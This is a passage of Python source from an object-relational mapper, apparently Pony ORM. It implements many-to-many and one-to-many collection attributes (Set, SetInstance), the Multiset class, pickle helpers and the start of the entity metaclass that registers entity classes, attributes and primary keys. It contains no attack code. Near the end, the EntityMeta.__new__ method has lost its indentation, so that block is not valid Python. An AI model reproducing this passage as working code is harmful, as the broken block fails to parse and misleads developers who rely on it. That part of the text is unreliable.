            # Mark the reverse attribute as read on each item so optimistic
            # checks notice concurrent modification.
            added = setdata.added or ()
            for item in setdata:
                if item in added: continue
                bit = item._bits_except_volatile_[reverse]
                assert item._wbits_ is not None
                if not item._wbits_ & bit: item._rbits_ |= bit
        return set(setdata)
    @cut_traceback
    def __get__(attr, obj, cls=None):
        """Descriptor read: return a live SetInstance wrapper for obj.attr."""
        if obj is None: return attr
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        rentity = attr.py_type
        wrapper_class = rentity._get_set_wrapper_subclass_()
        return wrapper_class(obj, attr)
    @cut_traceback
    def __set__(attr, obj, new_items, undo_funcs=None):
        """Descriptor write: replace the collection content with `new_items`."""
        if isinstance(new_items, SetInstance) and new_items._obj_ is obj and new_items._attr_ is attr:
            return  # after += or -= the wrapper assigns itself back; nothing to do
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        with cache.flush_disabled():
            new_items = attr.validate(new_items, obj)
            reverse = attr.reverse
            if not reverse: throw(NotImplementedError)
            setdata = obj._vals_.get(attr)
            if setdata is None:
                if obj._status_ == 'created':
                    setdata = obj._vals_[attr] = SetData()
                    setdata.is_fully_loaded = True
                    setdata.count = 0
                else: setdata = attr.load(obj)
            elif not setdata.is_fully_loaded: setdata = attr.load(obj)
            if new_items == setdata: return
            to_add = new_items - setdata
            to_remove = setdata - new_items
            # When called from the reverse side, undo bookkeeping is shared.
            is_reverse_call = undo_funcs is not None
            if not is_reverse_call: undo_funcs = []
            try:
                if not reverse.is_collection:
                    if attr.cascade_delete:
                        for item in to_remove: item._delete_(undo_funcs)
                    else:
                        for item in to_remove: reverse.__set__(item, None, undo_funcs)
                    for item in to_add: reverse.__set__(item, obj, undo_funcs)
                else:
                    reverse.reverse_remove(to_remove, obj, undo_funcs)
                    reverse.reverse_add(to_add, obj, undo_funcs)
            except:
                # Roll back partial reverse-side updates before re-raising.
                if not is_reverse_call:
                    for undo_func in reversed(undo_funcs): undo_func()
                raise
            setdata.clear()
            setdata |= new_items
            if setdata.count is not None: setdata.count = len(new_items)
            added = setdata.added
            removed = setdata.removed
            if to_add:
                if removed: (to_add, setdata.removed) = (to_add - removed, removed - to_add)
                if added: added |= to_add
                else: setdata.added = to_add  # added may be None
            if to_remove:
                if added: (to_remove, setdata.added) = (to_remove - added, added - to_remove)
                if removed: removed |= to_remove
                else: setdata.removed = to_remove  # removed may be None
            cache.modified_collections[attr].add(obj)
            cache.modified = True
    def __delete__(attr, obj):
        throw(NotImplementedError)
    def reverse_add(attr, objects, item, undo_funcs):
        """Add `item` to this collection on each of `objects` (reverse-side
        update), registering an undo callback in `undo_funcs`."""
        undo = []
        cache = item._session_cache_
        objects_with_modified_collections = cache.modified_collections[attr]
        for obj in objects:
            setdata = obj._vals_.get(attr)
            if setdata is None: setdata = obj._vals_[attr] = SetData()
            else: assert item not in setdata
            if setdata.added is None: setdata.added = set()
            else: assert item not in setdata.added
            in_removed = setdata.removed and item in setdata.removed
            was_modified_earlier = obj in objects_with_modified_collections
            undo.append((obj, in_removed, was_modified_earlier))
            setdata.add(item)
            if setdata.count is not None: setdata.count += 1
            # Re-adding a pending-removed item just cancels the removal.
            if in_removed: setdata.removed.remove(item)
            else: setdata.added.add(item)
            objects_with_modified_collections.add(obj)
        def undo_func():
            for obj, in_removed, was_modified_earlier in undo:
                setdata = obj._vals_[attr]
                setdata.remove(item)
                if setdata.count is not None: setdata.count -= 1
                if in_removed: setdata.removed.add(item)
                else: setdata.added.remove(item)
                if not was_modified_earlier: objects_with_modified_collections.remove(obj)
        undo_funcs.append(undo_func)
    def db_reverse_add(attr, objects, item):
        """Record freshly-loaded database membership of `item` on `objects`."""
        for obj in objects:
            setdata = obj._vals_.get(attr)
            if setdata is None: setdata = obj._vals_[attr] = SetData()
            elif setdata.is_fully_loaded: throw(UnrepeatableReadError,
                'Phantom object %s appeared in collection %s.%s' % (safe_repr(item), safe_repr(obj), attr.name))
            setdata.add(item)
    def reverse_remove(attr, objects, item, undo_funcs):
        """Remove `item` from this collection on each of `objects` (reverse-side
        update), registering an undo callback in `undo_funcs`."""
        undo = []
        cache = item._session_cache_
        objects_with_modified_collections = cache.modified_collections[attr]
        for obj in objects:
            setdata = obj._vals_.get(attr)
            assert setdata is not None
            assert item in setdata
            if setdata.removed is None: setdata.removed = set()
            else: assert item not in setdata.removed
            in_added = setdata.added and item in setdata.added
            was_modified_earlier = obj in objects_with_modified_collections
            undo.append((obj, in_added, was_modified_earlier))
            objects_with_modified_collections.add(obj)
            setdata.remove(item)
            if setdata.count is not None: setdata.count -= 1
            # Removing a pending-added item just cancels the addition.
            if in_added: setdata.added.remove(item)
            else: setdata.removed.add(item)
        def undo_func():
            # Fix: the tuples were built as (obj, in_added, was_modified_earlier)
            # but the original unpacked the second element as in_removed, so the
            # `if in_added:` test below read a stale variable leaked from the
            # enclosing loop and could corrupt added/removed bookkeeping.
            for obj, in_added, was_modified_earlier in undo:
                setdata = obj._vals_[attr]
                setdata.add(item)
                if setdata.count is not None: setdata.count += 1
                if in_added: setdata.added.add(item)
                else: setdata.removed.remove(item)
                if not was_modified_earlier: objects_with_modified_collections.remove(obj)
        undo_funcs.append(undo_func)
    def db_reverse_remove(attr, objects, item):
        """Drop database-loaded membership of `item` from `objects`."""
        for obj in objects:
            setdata = obj._vals_[attr]
            setdata.remove(item)
    def get_m2m_columns(attr, is_reverse=False):
        """Resolve (and validate) the link-table column names for this side
        of the m2m relation, computing defaults on first use."""
        reverse = attr.reverse
        entity = attr.entity
        pk_length = len(entity._get_pk_columns_())
        provider = entity._database_.provider
        if attr.symmetric or entity is reverse.entity:
            # Self-referential (possibly symmetric) relation.
            if attr._columns_checked:
                if not attr.symmetric: return attr.columns
                if not is_reverse: return attr.columns
                return attr.reverse_columns
            if not attr.symmetric: assert not reverse._columns_checked
            if attr.columns:
                if len(attr.columns) != pk_length: throw(MappingError,
                    'Invalid number of columns for %s' % reverse)
            else: attr.columns = provider.get_default_m2m_column_names(entity)
            attr._columns_checked = True
            attr.converters = entity._pk_converters_
            if attr.symmetric:
                if not attr.reverse_columns:
                    attr.reverse_columns = [ column + '_2' for column in attr.columns ]
                elif len(attr.reverse_columns) != pk_length:
                    throw(MappingError, "Invalid number of reverse columns for symmetric attribute %s" % attr)
                return attr.columns if not is_reverse else attr.reverse_columns
            else:
                if not reverse.columns:
                    reverse.columns = [ column + '_2' for column in attr.columns ]
                reverse._columns_checked = True
                reverse.converters = entity._pk_converters_
                return attr.columns if not is_reverse else reverse.columns
        # Ordinary relation between two different entities: this side's link
        # columns are stored on the reverse attribute.
        if attr._columns_checked: return reverse.columns
        elif reverse.columns:
            if len(reverse.columns) != pk_length: throw(MappingError,
                'Invalid number of columns for %s' % reverse)
        else: reverse.columns = provider.get_default_m2m_column_names(entity)
        reverse.converters = entity._pk_converters_
        attr._columns_checked = True
        return reverse.columns
    def remove_m2m(attr, removed):
        """Execute DELETEs on the link table for (obj, item) pairs in `removed`."""
        assert removed
        entity = attr.entity
        database = entity._database_
        cached_sql = attr.cached_remove_m2m_sql
        if cached_sql is None:
            reverse = attr.reverse
            where_list = [ 'WHERE' ]
            if attr.symmetric:
                columns = attr.columns + attr.reverse_columns
                converters = attr.converters + attr.converters
            else:
                columns = reverse.columns + attr.columns
                converters = reverse.converters + attr.converters
            for i, (column, converter) in enumerate(izip(columns, converters)):
                where_list.append([ converter.EQ, ['COLUMN', None, column], [ 'PARAM', (i, None, None), converter ] ])
            from_ast = [ 'FROM', [ None, 'TABLE', attr.table ] ]
            sql_ast = [ 'DELETE', None, from_ast, where_list ]
            sql, adapter = database._ast2sql(sql_ast)
            attr.cached_remove_m2m_sql = sql, adapter
        else: sql, adapter = cached_sql
        arguments_list = [ adapter(obj._get_raw_pkval_() + robj._get_raw_pkval_())
                           for obj, robj in removed ]
        database._exec_sql(sql, arguments_list)
    def add_m2m(attr, added):
        """Execute INSERTs into the link table for (obj, item) pairs in `added`."""
        assert added
        entity = attr.entity
        database = entity._database_
        cached_sql = attr.cached_add_m2m_sql
        if cached_sql is None:
            reverse = attr.reverse
            if attr.symmetric:
                columns = attr.columns + attr.reverse_columns
                converters = attr.converters + attr.converters
            else:
                columns = reverse.columns + attr.columns
                converters = reverse.converters + attr.converters
            params = [ [ 'PARAM', (i, None, None), converter ] for i, converter in enumerate(converters) ]
            sql_ast = [ 'INSERT', attr.table, columns, params ]
            sql, adapter = database._ast2sql(sql_ast)
            attr.cached_add_m2m_sql = sql, adapter
        else: sql, adapter = cached_sql
        arguments_list = [ adapter(obj._get_raw_pkval_() + robj._get_raw_pkval_())
                           for obj, robj in added ]
        database._exec_sql(sql, arguments_list)
    @cut_traceback
    @db_session(ddl=True)
    def drop_table(attr, with_all_data=False):
        """Drop the m2m link table (or the reverse entity's table for
        one-to-many relations)."""
        if attr.reverse.is_collection: table_name = attr.table
        else: table_name = attr.entity._table_
        attr.entity._database_._drop_tables([ table_name ], True, with_all_data)
def unpickle_setwrapper(obj, attrname, items):
    """Pickle helper: rebuild a collection wrapper for obj.<attrname>.

    Counterpart of SetInstance.__reduce__; marks the attribute's setdata
    as fully loaded so the restored wrapper does not hit the database.
    """
    attr = getattr(obj.__class__, attrname)
    wrapper_cls = attr.py_type._get_set_wrapper_subclass_()
    result = wrapper_cls(obj, attr)
    setdata = obj._vals_.get(attr)
    if setdata is None:
        setdata = obj._vals_[attr] = SetData()
    setdata.is_fully_loaded = True
    setdata.absent = None
    setdata.count = len(setdata)
    return result
class SetInstance(object):
    """Live, set-like view of ``obj.attr`` returned by Set.__get__.

    Holds no items itself: every operation goes through the attribute's
    SetData in ``obj._vals_`` (loading from the database on demand) and
    records additions/removals for the session cache to flush.
    """
    __slots__ = '_obj_', '_attr_', '_attrnames_'
    _parent_ = None  # NOTE(review): purpose not visible in this chunk — presumably overridden by tracker subclasses; confirm elsewhere
    def __init__(wrapper, obj, attr):
        wrapper._obj_ = obj
        wrapper._attr_ = attr
        wrapper._attrnames_ = (attr.name,)
    def __reduce__(wrapper):
        # Pickle as a plain-set snapshot; unpickle_setwrapper rebuilds the wrapper.
        return unpickle_setwrapper, (wrapper._obj_, wrapper._attr_.name, wrapper.copy())
    @cut_traceback
    def copy(wrapper):
        """Return the (fully loaded) collection content as a plain set."""
        return wrapper._attr_.copy(wrapper._obj_)
    @cut_traceback
    def __repr__(wrapper):
        return '<%s %r.%s>' % (wrapper.__class__.__name__, wrapper._obj_, wrapper._attr_.name)
    @cut_traceback
    def __str__(wrapper):
        # Outside a live db session the content cannot be loaded; show '...'.
        cache = wrapper._obj_._session_cache_
        if cache is None or not cache.is_alive: content = '...'
        else: content = ', '.join(imap(str, wrapper))
        return '%s([%s])' % (wrapper.__class__.__name__, content)
    @cut_traceback
    def __nonzero__(wrapper):
        """Truthiness: is the collection non-empty? Loads it if necessary."""
        attr = wrapper._attr_
        obj = wrapper._obj_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        setdata = obj._vals_.get(attr)
        if setdata is None: setdata = attr.load(obj)
        if setdata: return True
        if not setdata.is_fully_loaded: setdata = attr.load(obj)
        return bool(setdata)
    @cut_traceback
    def is_empty(wrapper):
        """Cheap emptiness test: issues a LIMIT-1 query instead of a full load."""
        attr = wrapper._attr_
        obj = wrapper._obj_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        setdata = obj._vals_.get(attr)
        # Answer from cached state when possible.
        if setdata is None: setdata = obj._vals_[attr] = SetData()
        elif setdata.is_fully_loaded: return not setdata
        elif setdata: return False
        elif setdata.count is not None: return not setdata.count
        entity = attr.entity
        reverse = attr.reverse
        rentity = reverse.entity
        database = entity._database_
        cached_sql = attr.cached_empty_sql
        if cached_sql is None:
            where_list = [ 'WHERE' ]
            for i, (column, converter) in enumerate(izip(reverse.columns, reverse.converters)):
                where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ])
            if not reverse.is_collection:
                table_name = rentity._table_
                select_list, attr_offsets = rentity._construct_select_clause_()
            else:
                table_name = attr.table
                select_list = [ 'ALL' ] + [ [ 'COLUMN', None, column ] for column in attr.columns ]
                attr_offsets = None
            sql_ast = [ 'SELECT', select_list, [ 'FROM', [ None, 'TABLE', table_name ] ],
                        where_list, [ 'LIMIT', 1 ] ]
            sql, adapter = database._ast2sql(sql_ast)
            attr.cached_empty_sql = sql, adapter, attr_offsets
        else: sql, adapter, attr_offsets = cached_sql
        arguments = adapter(obj._get_raw_pkval_())
        cursor = database._exec_sql(sql, arguments)
        if reverse.is_collection:
            row = cursor.fetchone()
            if row is not None:
                loaded_item = rentity._get_by_raw_pkval_(row)
                setdata.add(loaded_item)
                reverse.db_reverse_add((loaded_item,), obj)
        else: rentity._fetch_objects(cursor, attr_offsets)
        if setdata: return False
        # Nothing found: the collection is known empty; cache that fact.
        setdata.is_fully_loaded = True
        setdata.absent = None
        setdata.count = 0
        return True
    @cut_traceback
    def __len__(wrapper):
        """Exact size via a full load (see count() for the COUNT(*) variant)."""
        attr = wrapper._attr_
        obj = wrapper._obj_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        setdata = obj._vals_.get(attr)
        if setdata is None or not setdata.is_fully_loaded: setdata = attr.load(obj)
        return len(setdata)
    @cut_traceback
    def count(wrapper):
        """Collection size via SELECT COUNT(*), adjusted for pending changes."""
        attr = wrapper._attr_
        obj = wrapper._obj_
        cache = obj._session_cache_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        setdata = obj._vals_.get(attr)
        if setdata is None: setdata = obj._vals_[attr] = SetData()
        elif setdata.count is not None: return setdata.count
        if cache is None or not cache.is_alive: throw_db_session_is_over('read value of', obj, attr)
        entity = attr.entity
        reverse = attr.reverse
        database = entity._database_
        cached_sql = attr.cached_count_sql
        if cached_sql is None:
            where_list = [ 'WHERE' ]
            for i, (column, converter) in enumerate(izip(reverse.columns, reverse.converters)):
                where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ])
            if not reverse.is_collection: table_name = reverse.entity._table_
            else: table_name = attr.table
            sql_ast = [ 'SELECT', [ 'AGGREGATES', [ 'COUNT', None ] ],
                        [ 'FROM', [ None, 'TABLE', table_name ] ], where_list ]
            sql, adapter = database._ast2sql(sql_ast)
            attr.cached_count_sql = sql, adapter
        else: sql, adapter = cached_sql
        arguments = adapter(obj._get_raw_pkval_())
        with cache.flush_disabled():
            cursor = database._exec_sql(sql, arguments)
        setdata.count = cursor.fetchone()[0]
        # The database does not know about unflushed adds/removes; adjust.
        if setdata.added: setdata.count += len(setdata.added)
        if setdata.removed: setdata.count -= len(setdata.removed)
        return setdata.count
    @cut_traceback
    def __iter__(wrapper):
        # Iterate over a snapshot so mutation during iteration is safe.
        return iter(wrapper.copy())
    @cut_traceback
    def __eq__(wrapper, other):
        if isinstance(other, SetInstance):
            # Same object+attribute: trivially equal without loading.
            if wrapper._obj_ is other._obj_ and wrapper._attr_ is other._attr_: return True
            else: other = other.copy()
        elif not isinstance(other, set): other = set(other)
        items = wrapper.copy()
        return items == other
    @cut_traceback
    def __ne__(wrapper, other):
        return not wrapper.__eq__(other)
    @cut_traceback
    def __add__(wrapper, new_items):
        # Returns a plain set; does not modify the collection.
        return wrapper.copy().union(new_items)
    @cut_traceback
    def __sub__(wrapper, items):
        # Returns a plain set; does not modify the collection.
        return wrapper.copy().difference(items)
    @cut_traceback
    def __contains__(wrapper, item):
        """Membership test, answered from cache when possible, else via a
        targeted partial load; caches negative results in setdata.absent."""
        attr = wrapper._attr_
        obj = wrapper._obj_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        if obj._vals_ is None: throw_db_session_is_over('read value of', obj, attr)
        if not isinstance(item, attr.py_type): return False
        if item._session_cache_ is not obj._session_cache_:
            throw(TransactionError, 'An attempt to mix objects belonging to different transactions')
        reverse = attr.reverse
        if not reverse.is_collection:
            # One-to-many: check the item's reverse scalar attribute instead.
            obj2 = item._vals_[reverse] if reverse in item._vals_ else reverse.load(item)
            wbits = item._wbits_
            if wbits is not None:
                bit = item._bits_except_volatile_[reverse]
                if not wbits & bit: item._rbits_ |= bit
            return obj is obj2
        setdata = obj._vals_.get(attr)
        if setdata is not None:
            if item in setdata: return True
            if setdata.is_fully_loaded: return False
            if setdata.absent is not None and item in setdata.absent: return False
        else:
            # Maybe the item's own (fully loaded) reverse collection answers it.
            reverse_setdata = item._vals_.get(reverse)
            if reverse_setdata is not None and reverse_setdata.is_fully_loaded:
                return obj in reverse_setdata
        setdata = attr.load(obj, (item,))
        if item in setdata: return True
        if setdata.absent is None: setdata.absent = set()
        setdata.absent.add(item)
        return False
    @cut_traceback
    def create(wrapper, **kwargs):
        """Create a new item of the related entity, linked to this object."""
        attr = wrapper._attr_
        reverse = attr.reverse
        if reverse.name in kwargs: throw(TypeError,
            'When using %s.%s.create(), %r attribute should not be passed explicitly'
            % (attr.entity.__name__, attr.name, reverse.name))
        kwargs[reverse.name] = wrapper._obj_
        item_type = attr.py_type
        item = item_type(**kwargs)
        return item
    @cut_traceback
    def add(wrapper, new_items):
        """Add item(s) to the collection, updating the reverse side and
        recording the change for flush."""
        obj = wrapper._obj_
        attr = wrapper._attr_
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        with cache.flush_disabled():
            reverse = attr.reverse
            if not reverse: throw(NotImplementedError)
            new_items = attr.validate(new_items, obj)
            if not new_items: return
            setdata = obj._vals_.get(attr)
            # Skip items already present (may require a targeted load to know).
            if setdata is not None: new_items -= setdata
            if setdata is None or not setdata.is_fully_loaded:
                setdata = attr.load(obj, new_items)
                new_items -= setdata
            undo_funcs = []
            try:
                if not reverse.is_collection:
                    for item in new_items: reverse.__set__(item, obj, undo_funcs)
                else: reverse.reverse_add(new_items, obj, undo_funcs)
            except:
                # Roll back partial reverse-side updates before re-raising.
                for undo_func in reversed(undo_funcs): undo_func()
                raise
        setdata |= new_items
        if setdata.count is not None: setdata.count += len(new_items)
        added = setdata.added
        removed = setdata.removed
        # Adding pending-removed items cancels their removal.
        if removed: (new_items, setdata.removed) = (new_items-removed, removed-new_items)
        if added: added |= new_items
        else: setdata.added = new_items  # added may be None
        cache.modified_collections[attr].add(obj)
        cache.modified = True
    @cut_traceback
    def __iadd__(wrapper, items):
        wrapper.add(items)
        return wrapper
    @cut_traceback
    def remove(wrapper, items):
        """Remove item(s) from the collection, updating the reverse side
        (or cascade-deleting items) and recording the change for flush."""
        obj = wrapper._obj_
        attr = wrapper._attr_
        cache = obj._session_cache_
        if cache is None or not cache.is_alive: throw_db_session_is_over('change collection', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        with cache.flush_disabled():
            reverse = attr.reverse
            if not reverse: throw(NotImplementedError)
            items = attr.validate(items, obj)
            setdata = obj._vals_.get(attr)
            if setdata is not None and setdata.removed:
                items -= setdata.removed
            if not items: return
            # Only items actually present can be removed.
            if setdata is None or not setdata.is_fully_loaded:
                setdata = attr.load(obj, items)
            items &= setdata
            undo_funcs = []
            try:
                if not reverse.is_collection:
                    if attr.cascade_delete:
                        for item in items: item._delete_(undo_funcs)
                    else:
                        for item in items: reverse.__set__(item, None, undo_funcs)
                else: reverse.reverse_remove(items, obj, undo_funcs)
            except:
                # Roll back partial reverse-side updates before re-raising.
                for undo_func in reversed(undo_funcs): undo_func()
                raise
        setdata -= items
        if setdata.count is not None: setdata.count -= len(items)
        added = setdata.added
        removed = setdata.removed
        # Removing pending-added items cancels their addition.
        if added: (items, setdata.added) = (items - added, added - items)
        if removed: removed |= items
        else: setdata.removed = items  # removed may be None
        cache.modified_collections[attr].add(obj)
        cache.modified = True
    @cut_traceback
    def __isub__(wrapper, items):
        wrapper.remove(items)
        return wrapper
    @cut_traceback
    def clear(wrapper):
        """Remove all items (delegates to Set.__set__ with an empty tuple)."""
        obj = wrapper._obj_
        attr = wrapper._attr_
        cache = obj._session_cache_
        if cache is None or not obj._session_cache_.is_alive: throw_db_session_is_over('change collection', obj, attr)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        attr.__set__(obj, ())
    @cut_traceback
    def load(wrapper):
        """Force a full load of the collection from the database."""
        wrapper._attr_.load(wrapper._obj_)
    @cut_traceback
    def select(wrapper, *args):
        """Return a Query over the collection items, optionally filtered by
        the given lambda/generator arguments."""
        obj = wrapper._obj_
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        attr = wrapper._attr_
        reverse = attr.reverse
        query = reverse.entity._select_all()
        # Restrict the query to items related to this object.
        s = 'lambda item: JOIN(obj in item.%s)' if reverse.is_collection else 'lambda item: item.%s == obj'
        query = query.filter(s % reverse.name, {'obj' : obj, 'JOIN': JOIN})
        if args:
            func, globals, locals = get_globals_and_locals(args, kwargs=None, frame_depth=cut_traceback_depth+1)
            query = query.filter(func, globals, locals)
        return query
    filter = select  # alias: .filter(...) behaves exactly like .select(...)
    def limit(wrapper, limit=None, offset=None):
        return wrapper.select().limit(limit, offset)
    def page(wrapper, pagenum, pagesize=10):
        return wrapper.select().page(pagenum, pagesize)
    def order_by(wrapper, *args):
        return wrapper.select().order_by(*args)
    def sort_by(wrapper, *args):
        return wrapper.select().sort_by(*args)
    def random(wrapper, limit):
        return wrapper.select().random(limit)
def unpickle_multiset(obj, attrnames, items):
    """Pickle helper: rebuild the appropriate Multiset subclass for the
    attribute path ``obj.attr1.attr2...`` described by `attrnames`.

    Walks the path through the entity's attribute dict; if any step is not
    a relationship attribute, falls back to the generic Multiset class.
    """
    entity = obj.__class__
    for name in attrnames:
        attr = entity._adict_[name]
        if not attr.reverse:
            entity = None
            break
        entity = attr.py_type
    multiset_cls = Multiset if entity is None else entity._get_multiset_subclass_()
    return multiset_cls(obj, attrnames, items)
class Multiset(object):
    """Read-only multiset of values reached through a chain of collection
    attributes (e.g. ``group.students.courses``).

    Internally stores a dict mapping each distinct item to its
    multiplicity; iteration yields each item that many times.
    """
    __slots__ = [ '_obj_', '_attrnames_', '_items_' ]
    @cut_traceback
    def __init__(multiset, obj, attrnames, items):
        multiset._obj_ = obj
        multiset._attrnames_ = attrnames
        multiset._items_ = items if type(items) is dict else utils.distinct(items)
    def __reduce__(multiset):
        return unpickle_multiset, (multiset._obj_, multiset._attrnames_, multiset._items_)
    @cut_traceback
    def distinct(multiset):
        """Return a dict mapping each distinct item to its multiplicity."""
        return multiset._items_.copy()
    @cut_traceback
    def __repr__(multiset):
        cache = multiset._obj_._session_cache_
        size_str = ''
        if cache is not None and cache.is_alive:
            size = builtins.sum(itervalues(multiset._items_))
            size_str = ' (1 item)' if size == 1 else ' (%d items)' % size
        return '<%s %r.%s%s>' % (multiset.__class__.__name__, multiset._obj_,
                                 '.'.join(multiset._attrnames_), size_str)
    @cut_traceback
    def __str__(multiset):
        pairs = ', '.join('%r: %r' % pair for pair in sorted(iteritems(multiset._items_)))
        items_str = '{%s}' % pairs
        return '%s(%s)' % (multiset.__class__.__name__, items_str)
    @cut_traceback
    def __nonzero__(multiset):
        return bool(multiset._items_)
    @cut_traceback
    def __len__(multiset):
        return builtins.sum(multiset._items_.values())
    @cut_traceback
    def __iter__(multiset):
        # Yield each item as many times as its multiplicity.
        for item, cnt in iteritems(multiset._items_):
            i = 0
            while i < cnt:
                yield item
                i += 1
    @cut_traceback
    def __eq__(multiset, other):
        if isinstance(other, Multiset): return multiset._items_ == other._items_
        if isinstance(other, dict): return multiset._items_ == other
        if hasattr(other, 'keys'): return multiset._items_ == dict(other)
        return multiset._items_ == utils.distinct(other)
    @cut_traceback
    def __ne__(multiset, other):
        return not multiset.__eq__(other)
    @cut_traceback
    def __contains__(multiset, item):
        return item in multiset._items_
##class List(Collection): pass
##class Dict(Collection): pass
##class Relation(Collection): pass
class EntityIter(object):
    """Iterator stub returned by EntityMeta.__iter__.

    Direct iteration over an entity class is intentionally unsupported; the
    first next() call raises a TypeError pointing users to select().
    """
    def __init__(self, entity):
        self.entity = entity
    def next(self):
        msg = 'Use select(...) function or %s.select(...) method for iteration' % self.entity.__name__
        throw(TypeError, msg)
    if not PY2: __next__ = next
# Monotonically increasing id assigned to each entity class in definition order (see EntityMeta.__init__)
entity_id_counter = itertools.count(1)
# Temporary ids for new instances that do not have a primary key value yet (see _get_from_identity_map_)
new_instance_id_counter = itertools.count(1)
# Presumably used elsewhere to distinguish raw SQL text from lambda sources — not referenced in this chunk
select_re = re.compile(r'select\b', re.IGNORECASE)
lambda_re = re.compile(r'lambda\b')
class EntityMeta(type):
def __new__(meta, name, bases, cls_dict):
if 'Entity' in globals():
if '__slots__' in cls_dict: throw(TypeError, 'Entity classes cannot contain __slots__ variable')
cls_dict['__slots__'] = ()
return super(EntityMeta, meta).__new__(meta, name, bases, cls_dict)
    @cut_traceback
    def __init__(entity, name, bases, cls_dict):
        # Registers a newly defined entity class with its database: validates the
        # class name and inheritance graph, collects inherited and new attributes,
        # establishes the primary key and unique indexes, and initializes the
        # per-entity SQL caches. Raises ERDiagramError on any schema inconsistency.
        super(EntityMeta, entity).__init__(name, bases, cls_dict)
        entity._database_ = None
        # the abstract base class itself needs no further processing
        if name == 'Entity': return
        if not entity.__name__[:1].isupper():
            throw(ERDiagramError, 'Entity class name should start with a capital letter. Got: %s' % entity.__name__)
        # --- determine the single database all bases belong to ---
        databases = set()
        for base_class in bases:
            if isinstance(base_class, EntityMeta):
                database = base_class._database_
                if database is None: throw(ERDiagramError, 'Base Entity does not belong to any database')
                databases.add(database)
        if not databases: assert False # pragma: no cover
        elif len(databases) > 1: throw(ERDiagramError,
            'With multiple inheritance of entities, all entities must belong to the same database')
        database = databases.pop()
        if entity.__name__ in database.entities:
            throw(ERDiagramError, 'Entity %s already exists' % entity.__name__)
        assert entity.__name__ not in database.__dict__
        # entities cannot be added after the tables/mapping have been generated
        if database.schema is not None: throw(ERDiagramError,
            'Cannot define entity %r: database mapping has already been generated' % entity.__name__)
        entity._database_ = database
        entity._id_ = next(entity_id_counter)
        # --- build the inheritance bookkeeping (_direct_bases_/_all_bases_/_subclasses_/_root_) ---
        direct_bases = [ c for c in entity.__bases__ if issubclass(c, Entity) and c.__name__ != 'Entity' ]
        entity._direct_bases_ = direct_bases
        all_bases = entity._all_bases_ = set()
        entity._subclasses_ = set()
        for base in direct_bases:
            all_bases.update(base._all_bases_)
            all_bases.add(base)
        for base in all_bases:
            base._subclasses_.add(entity)
        if direct_bases:
            # all bases must share a single root; the root gets a discriminator attr
            root = entity._root_ = direct_bases[0]._root_
            for base in direct_bases[1:]:
                if base._root_ is not root: throw(ERDiagramError, 'Multiple inheritance graph must be diamond-like. '
                    "Entity %s inherits from %s and %s entities which don't have common base class."
                    % (name, root.__name__, base._root_.__name__))
            if root._discriminator_attr_ is None:
                assert root._discriminator_ is None
                Discriminator.create_default_attr(root)
        else:
            entity._root_ = entity
            entity._discriminator_attr_ = None
        # --- collect attributes inherited from direct bases, checking for clashes ---
        base_attrs = []
        base_attrs_dict = {}
        for base in direct_bases:
            for a in base._attrs_:
                prev = base_attrs_dict.get(a.name)
                if prev is None:
                    base_attrs_dict[a.name] = a
                    base_attrs.append(a)
                elif prev is not a: throw(ERDiagramError,
                    'Attribute "%s" clashes with attribute "%s" in derived entity "%s"'
                    % (prev, a, entity.__name__))
        entity._base_attrs_ = base_attrs
        # --- collect attributes declared directly on this class ---
        new_attrs = []
        for name, attr in items_list(entity.__dict__):
            if name in base_attrs_dict: throw(ERDiagramError, "Name '%s' hides base attribute %s" % (name,base_attrs_dict[name]))
            if not isinstance(attr, Attribute): continue
            if name.startswith('_') and name.endswith('_'): throw(ERDiagramError,
                'Attribute name cannot both start and end with underscore. Got: %s' % name)
            if attr.entity is not None: throw(ERDiagramError,
                'Duplicate use of attribute %s in entity %s' % (attr, entity.__name__))
            attr._init_(entity, name)
            new_attrs.append(attr)
        # sort by declaration order (attr.id is assigned at Attribute creation time)
        new_attrs.sort(key=attrgetter('id'))
        # --- indexes and primary key resolution ---
        indexes = entity._indexes_ = entity.__dict__.get('_indexes_', [])
        for attr in new_attrs:
            if attr.is_unique: indexes.append(Index(attr, is_pk=isinstance(attr, PrimaryKey)))
        for index in indexes: index._init_(entity)
        primary_keys = {index.attrs for index in indexes if index.is_pk}
        if direct_bases:
            if primary_keys: throw(ERDiagramError, 'Primary key cannot be redefined in derived classes')
            # inherit base indexes (prepended), deduplicated
            base_indexes = []
            for base in direct_bases:
                for index in base._indexes_:
                    if index not in base_indexes and index not in indexes: base_indexes.append(index)
            indexes[:0] = base_indexes
            primary_keys = {index.attrs for index in indexes if index.is_pk}
        if len(primary_keys) > 1: throw(ERDiagramError, 'Only one primary key can be defined in each entity class')
        elif not primary_keys:
            # no explicit PrimaryKey: synthesize an implicit auto-int `id` attribute
            if hasattr(entity, 'id'): throw(ERDiagramError,
                "Cannot create default primary key attribute for %s because name 'id' is already in use."
                " Please create a PrimaryKey attribute for entity %s or rename the 'id' attribute"
                % (entity.__name__, entity.__name__))
            attr = PrimaryKey(int, auto=True)
            attr.is_implicit = True
            attr._init_(entity, 'id')
            entity.id = attr
            new_attrs.insert(0, attr)
            pk_attrs = (attr,)
            index = Index(attr, is_pk=True)
            indexes.insert(0, index)
            index._init_(entity)
        else: pk_attrs = primary_keys.pop()
